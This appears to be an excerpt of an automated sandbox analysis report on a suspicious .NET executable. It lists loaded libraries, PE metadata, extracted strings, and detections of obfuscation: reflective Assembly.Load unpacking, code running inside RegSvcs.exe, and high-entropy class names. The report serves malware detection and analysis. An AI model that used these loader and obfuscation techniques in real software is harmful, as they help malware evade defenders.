                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: yGu4YUwMl6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: yGu4YUwMl6.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: Mono.Cecil.Pdb source: yGu4YUwMl6.exe
                    Source: Binary string: Microsoft.Build.Utilities.v4.0<>9__1_10<Weave>b__1_10columnHeader10<>9__1_0<Weave>b__1_0<>c__DisplayClass1_0<>9__2_0<.ctor>b__2_0<>9__3_0<WeaveDependencyObjectBaseClass>b__3_0<>9__14_0<GetStaticCtor>b__14_0<>c__DisplayClass4_0<>c__DisplayClass15_0<>c__DisplayClass5_0<>c__DisplayClass6_0<>9__7_0<IsAutoPropertySetter>b__7_0<>c__DisplayClass7_0<>c__DisplayClass18_0<>9__8_0<IsAutoPropertyGetter>b__8_0<GetStaticDependencyPropertyField>b__0<WeaveGetter>b__0<WeaveSetter>b__0<WeaveProperties>b__0<LoadWindows>b__0<WeaveDependencyProperty>b__0Ldarg_0get_<>h__TransparentIdentifier0<Weave>b__11columnHeader11<>9__1_1<Weave>b__1_1<>9__3_1<WeaveDependencyObjectBaseClass>b__3_1<cctor>5__1Ldarg_1IEnumerable`1Collection`1EqualityComparer`1IEnumerator`1List`1Form1WindowsFormsApplication1menuStrip1columnHeader1get_<>h__TransparentIdentifier1get_st1listView1<Weave>b__12columnHeader12Int32<>9__3_2<WeaveDependencyObjectBaseClass>b__3_2<propertyName>5__2<>9__2<Weave>b__2<>f__AnonymousType0`2<>f__AnonymousType1`2<>f__AnonymousType2`2Func`2IGrouping`2KeyValuePair`2Dictionary`2columnHeader2<>h__TransparentIdentifier2columnHeader13<>9__1_3<Weave>b__1_3<type>5__3<Weave>b__3Func`3columnHeader3columnHeader14<>9__1_4<Weave>b__1_4<declaringType>5__4<FindAttachedPropertyFields>d__4columnHeader4<>9__1_5<Weave>b__1_5<e>5__5columnHeader5<>9__1_6<Weave>b__1_6<isReadOnly>5__6columnHeader6<>9__1_7<Weave>b__1_7columnHeader7<Weave>b__8columnHeader8<>9<>9__1_9<Weave>b__1_9columnHeader9<Module>get_AGetWindowLongAget_BDWM_TNP_RECTSOURCEDWM_TNP_VISIBLEWS_VISIBLEGWL_STYLEPSIZESizeFget_GDWM_TNP_RECTDESTINATIONSystem.IOPAPLOPWS_BORDERget_RDWM_THUMBNAIL_PROPERTIESTget_grxVTARGETWINDOWZPVXDWM_TNP_SOURCECLIENTAREAONLYDWM_TNP_OPACITYaMono.Cecil.PdbmscorlibhThumbthumb<>cSystem.Collections.GenericMono.Collections.Genericget_IsStaticlpEnumFuncsrcget_Idget_CurrentManagedThreadId<>l__initialThreadIdProcessThreadLoadAddadd_SelectedIndexChangedcomboBox_SelectedIndexChangedset_FormattingEnabledSynchronized<<>h__TransparentIdentifier0>i__Field<<>h__TransparentIdentifier1>i__Field<method>i__Field<module>i__Field<type>i__Field<p>i__Field<TypePatternMatch>k__BackingField<AttributePatternMatch>k__BackingField<Definition>k__BackingField<HasChanges>k__BackingField<Files>k__BackingField<Assembly>k__BackingFieldAttachedPropertyFieldGetStaticDependencyPropertyFieldfieldLdsfldStsfldhWndget_OperandhwndAddGetterMethodAddSetterMethodImportObjectEqualsMethodget_GetMethodget_SetMethodImportMethodget_methodTracedefaultInstanceFieldReferenceMethodReferenceTypeReferenceMemberReferencePropertyReferencereferencercSourcesourceGetHashCodeget_OpCodeset_AutoScaleModenodeImageget_MessageLogMessagemessageAddRangeEndInvokeBeginInvokeImportPropertyChangedEventHandlerInvokeIEnumerableIDisposablefVisibleDWMHandleget_HandleoldHandleRuntimeTypeHandleGetTypeFromHandleget_MainWindowHandleSingleOpenFileWinFormsSampleget_MainWindowTitleget_Moduleget_MainModuleProcessModuleget_moduleget_Nameset_Nameget_FileNameget_MachineNameget_FullNamepropNa

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: yGu4YUwMl6.exe, DependencyPropertyWeaverTask.cs.Net Code: Execute System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, RrnBpqQBaojddDD8hq.cs.Net Code: vtH6byFBVi System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, RrnBpqQBaojddDD8hq.cs.Net Code: vtH6byFBVi System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, RrnBpqQBaojddDD8hq.cs.Net Code: vtH6byFBVi System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.yGu4YUwMl6.exe.5040000.5.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.yGu4YUwMl6.exe.36680a8.2.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068D7236 push FFFFFF8Bh; retf 3_2_068D723D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068D03A0 push es; ret 3_2_068D03B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068D63DF push dword ptr [esp+ecx*2-75h]; ret 3_2_068D63E3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068D0E50 push es; ret 3_2_068D0E60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068D1F59 push es; iretd 3_2_068D1F5C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068D1A80 push es; ret 3_2_068D1A90
                    Source: yGu4YUwMl6.exeStatic PE information: section name: .text entropy: 7.6358286098036405
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, exfEXn22sjxHam9s7A.csHigh entropy of concatenated method names: 'AmbhccLT9O', 'rAQhJiuTnu', 'y82tkfeUTV', 'XpmtmeOilL', 'sQLtW19VYa', 'SLUtdkluiw', 'RaGtMYI6Rw', 'jqLtsc1dAO', 'YmXtP315EZ', 'j9ytrFwHgn'
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, gsTtZUuYXsk06JHgpV.csHigh entropy of concatenated method names: 'sCqw1nPv3U', 's9Fwn37vvA', 'DpcwwXMsv1', 'DtFw3S2rKo', 'T42wXq2M2j', 'lB5wqKJL1B', 'Dispose', 'GRvUAw0Isd', 'ddDUoEyAb7', 'BwyUtg9nLr'
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, vbriyrvjuYM53PuOmB.csHigh entropy of concatenated method names: 'EsWnSlCdFY', 'D3EnTiEiIh', 'jTIUpvTs2L', 'W5sUlhwink', 'fAknglPuV6', 'KZDnyPdpSx', 'W7bnCFmLPf', 'W0on0xdeVA', 'e6qnOd13ty', 'o34nKKPH9R'
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, bXWD75xKucvbCDj9Yx.csHigh entropy of concatenated method names: 'dSbwHPQNrA', 'nVSw5vTneq', 'TQJwkMvIl8', 'QnXwmLtym0', 'EqnwWD3fAM', 'oE6wdAIrxv', 'JwJwMSROgH', 'QkkwsQXv3d', 'MpCwPsQoJe', 'bDDwrl1aFL'
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, Ggx7j5DQnVguv1OX6e.csHigh entropy of concatenated method names: 'tZpnBmyWQT', 'TDynNTQl5Z', 'ToString', 'yH5nAvZ7bH', 'PrfnotbBdn', 'j3JntqeqrB', 'SdDnhgu9td', 'CitnGF4iPv', 'HbcnLnA6B2', 'g1NnQ69Z5d'
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, wVxd3qzqXRIYOjYwxg.csHigh entropy of concatenated method names: 'JhZi8wjkwV', 'iIfiV6OO1X', 'lMSiIxnThd', 'iH0iHBVFec', 'Jvki516rvB', 'a3WimAKZfx', 'gGviWqMQde', 'sciiqLJE5K', 'pZ2ijfgnR5', 'IxoiRBNyI3'
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, RrnBpqQBaojddDD8hq.csHigh entropy of concatenated method names: 'uGBEZ7s77q', 'rhTEAuVqC2', 'O00EoAQs3Q', 'eAFEt0v6K2', 'uVcEh9MCMp', 'k9hEGiK5P4', 'DSIEL7UrHH', 'qA4EQUuXZv', 'K80EFcA1wT', 'NjyEBc2GZw'
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, o6nw6vIHe4lbdCnCUW.csHigh entropy of concatenated method names: 'N3ktffPfet', 'yAHt8NM4cF', 'yl0tV8XbNu', 'CwKtIU3dVt', 'lSmt1aJMaL', 'tWYtarWkXE', 'GNwtnNxPZN', 'hp6tUZe3Oy', 'CYOtwoJNkD', 'P2wtiHi0sl'
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, fsr3C1KW3t0DeGClTh.csHigh entropy of concatenated method names: 'ToString', 'pZuag2Twna', 'W52a5PCOof', 'oHOakkCgZS', 'WG1amV07ZF', 'XlnaWF0x1F', 'iYradfdLyy', 'POnaM5GgNY', 'XYYas4OwS3', 'JpfaPvDc8t'
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, qLiIssPN1Nihn4bacr.csHigh entropy of concatenated method names: 'KB4LjoVKKU', 'dSqLRoXChQ', 'TOELbXaWEO', 'gdDLfbAbto', 'oiaLccCpdN', 'S1eL8JuboB', 'jOCLJVanrY', 'a3SLVCWJgQ', 'pjvLIuy8pX', 'IU8L2r3snw'
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, qZLV3elpfX4jgkaiXy5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'C0MigXZSUB', 'B7YiyKoTbA', 'g7HiCIc7El', 'r99i0uOUY5', 'pY3iOpyrSP', 'cs7iKUShKv', 'u7CiDoGRbO'
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, c9W0LjtbC4fBta8E8u.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Ubd9x35x9p', 'Lxr9T33nwA', 'YWP9z71pwo', 'VhWEplxTrn', 'imBElXMAOO', 'QjnE901EZh', 'PAuEER5omZ', 'FChFisZhW062oGhQ6vB'
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, ddWCrGllHMjDUujjMMs.csHigh entropy of concatenated method names: 'p7viTUI651', 'YVcizhghY9', 'pHv3pHlVrn', 'LXD3lNwtuf', 'XYh39kcrKt', 'Sdr3EqFIU0', 'Krh362e7AQ', 'BBe3ZhJ3Nt', 'vRM3AjMIw7', 'rkl3oXla1q'
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, OVo2uO9oWvvdGIIukb.csHigh entropy of concatenated method names: 'I0hbg7B8f', 'TS1fF8J8b', 'F1r8D01A7', 'quWJ2Owrj', 'f4OIQMYb2', 'pwF2nQ1FA', 'tpVHhH3o7J6nLeRjAK', 'ESoR0MvmrdAk4LTW7D', 'PoCUAwQ0g', 'N0nit7y9V'
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, EhCKRaHhdsWu8su5Lj.csHigh entropy of concatenated method names: 'CZkGZkFNqs', 'QfyGogpfT8', 'CHNGh8GaXO', 'ns0GLaoik6', 'dLHGQndKjg', 'zgBh7FmJdX', 'GZchv5Ws4g', 'WPUhuOIMZ4', 'E37hSEQtYQ', 'I1JhxZ5w0s'
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, EcaDEi6U2ggoLNcIVA.csHigh entropy of concatenated method names: 'w8UlLKnfCK', 'YBvlQUrY1H', 'VHelB4lbdC', 'qCUlNWZxfE', 'I9sl17AIhC', 'SRalahdsWu', 'h9EWd5B3BX5NDGNYex', 'CO9Es4kqCInWRr0EJ4', 'QFUllAwjPV', 'isXlEHmJXp'
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, rKnfCKVTBvUrY1HLXt.csHigh entropy of concatenated method names: 'mUEo09ax0B', 'VwmoOpIuBV', 'pNDoKyEYXV', 'yFIoDi1fC8', 'HOCo7uHSPk', 'jFsovlKEFZ', 'DcIouBX7sK', 'isEoSAXf9I', 'Jlroxm8Z2i', 'iNloTa0uBL'
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, JIrIkel6pInI8Xm1ZIl.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Gw94wQiXAV', 'Biu4ijqmOg', 'LIN43Dk3s7', 'Ylf44LSmpo', 'maU4Xe2Fdw', 'i5r4YKOTPm', 'Ou84qTc2Wf'
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, hKWgy7oAP9V2fUx985.csHigh entropy of concatenated method names: 'Dispose', 'Mk0lx6JHgp', 'G9G95gt69a', 'qcqb0wyW5I', 'EgNlT3qLBm', 'Y8Mlzvrbgr', 'ProcessDialogKey', 'o6l9pXWD75', 'Suc9lvbCDj', 'bYx99uLTNR'
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, R2EI36MnNfQtmd2hPv.csHigh entropy of concatenated method names: 'UEvLAaMyJB', 'mHELtoya4M', 'PbTLGi6kfO', 'YY9GTcsKMr', 'OjWGzhmG1X', 'PiBLpg2Zlf', 'giKLl1eA85', 'rtbL9DWFK5', 'lTILESoEVF', 'qxpL6YDElu'
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, JEVOx2C0XPOTEo0S0r.csHigh entropy of concatenated method names: 'QtbeVw2K9j', 'ypMeIwAN5M', 'odYeHMU9jm', 'aKPe5OPeSt', 'fX7em9bdlI', 'cuieWHeqgk', 'H4veM1wDKn', 'Onkes76a6r', 'OVUerOf1mN', 'uCMegBy9qa'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, exfEXn22sjxHam9s7A.csHigh entropy of concatenated method names: 'AmbhccLT9O', 'rAQhJiuTnu', 'y82tkfeUTV', 'XpmtmeOilL', 'sQLtW19VYa', 'SLUtdkluiw', 'RaGtMYI6Rw', 'jqLtsc1dAO', 'YmXtP315EZ', 'j9ytrFwHgn'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, gsTtZUuYXsk06JHgpV.csHigh entropy of concatenated method names: 'sCqw1nPv3U', 's9Fwn37vvA', 'DpcwwXMsv1', 'DtFw3S2rKo', 'T42wXq2M2j', 'lB5wqKJL1B', 'Dispose', 'GRvUAw0Isd', 'ddDUoEyAb7', 'BwyUtg9nLr'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, vbriyrvjuYM53PuOmB.csHigh entropy of concatenated method names: 'EsWnSlCdFY', 'D3EnTiEiIh', 'jTIUpvTs2L', 'W5sUlhwink', 'fAknglPuV6', 'KZDnyPdpSx', 'W7bnCFmLPf', 'W0on0xdeVA', 'e6qnOd13ty', 'o34nKKPH9R'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, bXWD75xKucvbCDj9Yx.csHigh entropy of concatenated method names: 'dSbwHPQNrA', 'nVSw5vTneq', 'TQJwkMvIl8', 'QnXwmLtym0', 'EqnwWD3fAM', 'oE6wdAIrxv', 'JwJwMSROgH', 'QkkwsQXv3d', 'MpCwPsQoJe', 'bDDwrl1aFL'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, Ggx7j5DQnVguv1OX6e.csHigh entropy of concatenated method names: 'tZpnBmyWQT', 'TDynNTQl5Z', 'ToString', 'yH5nAvZ7bH', 'PrfnotbBdn', 'j3JntqeqrB', 'SdDnhgu9td', 'CitnGF4iPv', 'HbcnLnA6B2', 'g1NnQ69Z5d'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, wVxd3qzqXRIYOjYwxg.csHigh entropy of concatenated method names: 'JhZi8wjkwV', 'iIfiV6OO1X', 'lMSiIxnThd', 'iH0iHBVFec', 'Jvki516rvB', 'a3WimAKZfx', 'gGviWqMQde', 'sciiqLJE5K', 'pZ2ijfgnR5', 'IxoiRBNyI3'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, RrnBpqQBaojddDD8hq.csHigh entropy of concatenated method names: 'uGBEZ7s77q', 'rhTEAuVqC2', 'O00EoAQs3Q', 'eAFEt0v6K2', 'uVcEh9MCMp', 'k9hEGiK5P4', 'DSIEL7UrHH', 'qA4EQUuXZv', 'K80EFcA1wT', 'NjyEBc2GZw'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, o6nw6vIHe4lbdCnCUW.csHigh entropy of concatenated method names: 'N3ktffPfet', 'yAHt8NM4cF', 'yl0tV8XbNu', 'CwKtIU3dVt', 'lSmt1aJMaL', 'tWYtarWkXE', 'GNwtnNxPZN', 'hp6tUZe3Oy', 'CYOtwoJNkD', 'P2wtiHi0sl'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, fsr3C1KW3t0DeGClTh.csHigh entropy of concatenated method names: 'ToString', 'pZuag2Twna', 'W52a5PCOof', 'oHOakkCgZS', 'WG1amV07ZF', 'XlnaWF0x1F', 'iYradfdLyy', 'POnaM5GgNY', 'XYYas4OwS3', 'JpfaPvDc8t'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, qLiIssPN1Nihn4bacr.csHigh entropy of concatenated method names: 'KB4LjoVKKU', 'dSqLRoXChQ', 'TOELbXaWEO', 'gdDLfbAbto', 'oiaLccCpdN', 'S1eL8JuboB', 'jOCLJVanrY', 'a3SLVCWJgQ', 'pjvLIuy8pX', 'IU8L2r3snw'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, qZLV3elpfX4jgkaiXy5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'C0MigXZSUB', 'B7YiyKoTbA', 'g7HiCIc7El', 'r99i0uOUY5', 'pY3iOpyrSP', 'cs7iKUShKv', 'u7CiDoGRbO'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, c9W0LjtbC4fBta8E8u.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Ubd9x35x9p', 'Lxr9T33nwA', 'YWP9z71pwo', 'VhWEplxTrn', 'imBElXMAOO', 'QjnE901EZh', 'PAuEER5omZ', 'FChFisZhW062oGhQ6vB'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, ddWCrGllHMjDUujjMMs.csHigh entropy of concatenated method names: 'p7viTUI651', 'YVcizhghY9', 'pHv3pHlVrn', 'LXD3lNwtuf', 'XYh39kcrKt', 'Sdr3EqFIU0', 'Krh362e7AQ', 'BBe3ZhJ3Nt', 'vRM3AjMIw7', 'rkl3oXla1q'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, OVo2uO9oWvvdGIIukb.csHigh entropy of concatenated method names: 'I0hbg7B8f', 'TS1fF8J8b', 'F1r8D01A7', 'quWJ2Owrj', 'f4OIQMYb2', 'pwF2nQ1FA', 'tpVHhH3o7J6nLeRjAK', 'ESoR0MvmrdAk4LTW7D', 'PoCUAwQ0g', 'N0nit7y9V'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, EhCKRaHhdsWu8su5Lj.csHigh entropy of concatenated method names: 'CZkGZkFNqs', 'QfyGogpfT8', 'CHNGh8GaXO', 'ns0GLaoik6', 'dLHGQndKjg', 'zgBh7FmJdX', 'GZchv5Ws4g', 'WPUhuOIMZ4', 'E37hSEQtYQ', 'I1JhxZ5w0s'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, EcaDEi6U2ggoLNcIVA.csHigh entropy of concatenated method names: 'w8UlLKnfCK', 'YBvlQUrY1H', 'VHelB4lbdC', 'qCUlNWZxfE', 'I9sl17AIhC', 'SRalahdsWu', 'h9EWd5B3BX5NDGNYex', 'CO9Es4kqCInWRr0EJ4', 'QFUllAwjPV', 'isXlEHmJXp'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, rKnfCKVTBvUrY1HLXt.csHigh entropy of concatenated method names: 'mUEo09ax0B', 'VwmoOpIuBV', 'pNDoKyEYXV', 'yFIoDi1fC8', 'HOCo7uHSPk', 'jFsovlKEFZ', 'DcIouBX7sK', 'isEoSAXf9I', 'Jlroxm8Z2i', 'iNloTa0uBL'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, JIrIkel6pInI8Xm1ZIl.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Gw94wQiXAV', 'Biu4ijqmOg', 'LIN43Dk3s7', 'Ylf44LSmpo', 'maU4Xe2Fdw', 'i5r4YKOTPm', 'Ou84qTc2Wf'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, hKWgy7oAP9V2fUx985.csHigh entropy of concatenated method names: 'Dispose', 'Mk0lx6JHgp', 'G9G95gt69a', 'qcqb0wyW5I', 'EgNlT3qLBm', 'Y8Mlzvrbgr', 'ProcessDialogKey', 'o6l9pXWD75', 'Suc9lvbCDj', 'bYx99uLTNR'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, R2EI36MnNfQtmd2hPv.csHigh entropy of concatenated method names: 'UEvLAaMyJB', 'mHELtoya4M', 'PbTLGi6kfO', 'YY9GTcsKMr', 'OjWGzhmG1X', 'PiBLpg2Zlf', 'giKLl1eA85', 'rtbL9DWFK5', 'lTILESoEVF', 'qxpL6YDElu'
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, JEVOx2C0XPOTEo0S0r.csHigh entropy of concatenated method names: 'QtbeVw2K9j', 'ypMeIwAN5M', 'odYeHMU9jm', 'aKPe5OPeSt', 'fX7em9bdlI', 'cuieWHeqgk', 'H4veM1wDKn', 'Onkes76a6r', 'OVUerOf1mN', 'uCMegBy9qa'
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, exfEXn22sjxHam9s7A.csHigh entropy of concatenated method names: 'AmbhccLT9O', 'rAQhJiuTnu', 'y82tkfeUTV', 'XpmtmeOilL', 'sQLtW19VYa', 'SLUtdkluiw', 'RaGtMYI6Rw', 'jqLtsc1dAO', 'YmXtP315EZ', 'j9ytrFwHgn'
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, gsTtZUuYXsk06JHgpV.csHigh entropy of concatenated method names: 'sCqw1nPv3U', 's9Fwn37vvA', 'DpcwwXMsv1', 'DtFw3S2rKo', 'T42wXq2M2j', 'lB5wqKJL1B', 'Dispose', 'GRvUAw0Isd', 'ddDUoEyAb7', 'BwyUtg9nLr'
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, vbriyrvjuYM53PuOmB.csHigh entropy of concatenated method names: 'EsWnSlCdFY', 'D3EnTiEiIh', 'jTIUpvTs2L', 'W5sUlhwink', 'fAknglPuV6', 'KZDnyPdpSx', 'W7bnCFmLPf', 'W0on0xdeVA', 'e6qnOd13ty', 'o34nKKPH9R'
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, bXWD75xKucvbCDj9Yx.csHigh entropy of concatenated method names: 'dSbwHPQNrA', 'nVSw5vTneq', 'TQJwkMvIl8', 'QnXwmLtym0', 'EqnwWD3fAM', 'oE6wdAIrxv', 'JwJwMSROgH', 'QkkwsQXv3d', 'MpCwPsQoJe', 'bDDwrl1aFL'
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, Ggx7j5DQnVguv1OX6e.csHigh entropy of concatenated method names: 'tZpnBmyWQT', 'TDynNTQl5Z', 'ToString', 'yH5nAvZ7bH', 'PrfnotbBdn', 'j3JntqeqrB', 'SdDnhgu9td', 'CitnGF4iPv', 'HbcnLnA6B2', 'g1NnQ69Z5d'
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, wVxd3qzqXRIYOjYwxg.csHigh entropy of concatenated method names: 'JhZi8wjkwV', 'iIfiV6OO1X', 'lMSiIxnThd', 'iH0iHBVFec', 'Jvki516rvB', 'a3WimAKZfx', 'gGviWqMQde', 'sciiqLJE5K', 'pZ2ijfgnR5', 'IxoiRBNyI3'
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, RrnBpqQBaojddDD8hq.csHigh entropy of concatenated method names: 'uGBEZ7s77q', 'rhTEAuVqC2', 'O00EoAQs3Q', 'eAFEt0v6K2', 'uVcEh9MCMp', 'k9hEGiK5P4', 'DSIEL7UrHH', 'qA4EQUuXZv', 'K80EFcA1wT', 'NjyEBc2GZw'
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, o6nw6vIHe4lbdCnCUW.csHigh entropy of concatenated method names: 'N3ktffPfet', 'yAHt8NM4cF', 'yl0tV8XbNu', 'CwKtIU3dVt', 'lSmt1aJMaL', 'tWYtarWkXE', 'GNwtnNxPZN', 'hp6tUZe3Oy', 'CYOtwoJNkD', 'P2wtiHi0sl'
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, fsr3C1KW3t0DeGClTh.csHigh entropy of concatenated method names: 'ToString', 'pZuag2Twna', 'W52a5PCOof', 'oHOakkCgZS', 'WG1amV07ZF', 'XlnaWF0x1F', 'iYradfdLyy', 'POnaM5GgNY', 'XYYas4OwS3', 'JpfaPvDc8t'
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, qLiIssPN1Nihn4bacr.csHigh entropy of concatenated method names: 'KB4LjoVKKU', 'dSqLRoXChQ', 'TOELbXaWEO', 'gdDLfbAbto', 'oiaLccCpdN', 'S1eL8JuboB', 'jOCLJVanrY', 'a3SLVCWJgQ', 'pjvLIuy8pX', 'IU8L2r3snw'
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, qZLV3elpfX4jgkaiXy5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'C0MigXZSUB', 'B7YiyKoTbA', 'g7HiCIc7El', 'r99i0uOUY5', 'pY3iOpyrSP', 'cs7iKUShKv', 'u7CiDoGRbO'
